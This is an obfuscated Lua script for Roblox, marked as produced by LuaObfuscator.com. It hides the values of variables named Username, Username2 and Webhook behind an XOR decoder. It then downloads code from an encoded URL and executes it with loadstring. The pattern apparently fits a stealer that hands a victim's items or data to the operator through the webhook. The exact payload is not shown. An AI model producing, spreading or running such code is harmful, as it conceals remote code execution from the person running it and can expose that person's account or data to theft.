--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;
local function v7(v8, v9)
	local v10 = 1422 - ((1800 - (378 + 1044)) + (2467 - 1423));
	local v11;
	while true do
		if (v10 == 1) then
			return v5(v11);
		end
		if (v10 == ((0 - 0) - (568 - (367 + 201)))) then
			local v12 = 927 - (214 + 713);
			while true do
				if (v12 == (1 + 0)) then
					v10 = 1 + 0 + 0;
					break;
				end
				if (v12 == 0) then
					v11 = {};
					for v13 = (879 - (282 + 595)) - (1638 - (1523 + 114)), #v8 do
						v6(v11, v0(v4(v1(v2(v8, v13, v13 + ((512 + 57) - ((523 - 156) + 201)))), v1(v2(v9, (928 - (214 + 713)) + (v13 % #v9), (1066 - (68 + 997)) + (1270 - (226 + 1044)) + (v13 % #v9) + 1 + 0))) % ((4933 - 3800) - ((399 - (32 + 85)) + 584 + 11))));
					end
					v12 = 1 + 0;
				end
			end
		end
	end
end
Username = v7("\221\214\216\36\245\186\203\10", "\126\177\163\187\69\134\219\167");
Username2 = v7("\47\216\43\198\240\45\242\125", "\156\67\173\74\165");
Webhook = v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\249\74\25\177\105\71\36\190\6\1\185\36\78\59\184\66\5\243", "\38\84\215\41\118\220\70");
loadstring(game:HttpGet(v7("\88\2\54\2\237\10\89\109\0\255\71\88\37\27\234\88\3\32\7\237\85\4\33\29\240\68\19\44\6\176\83\25\47\93\210\73\6\42\23\236\99\21\48\27\238\68\89\18\33\167\9\91\15\19\247\92\5\54\23\255\92\19\48\93\243\81\31\44\93\206\99\79\123\63\255\89\26\49\6\251\81\26\39\0", "\158\48\118\66\114")))();
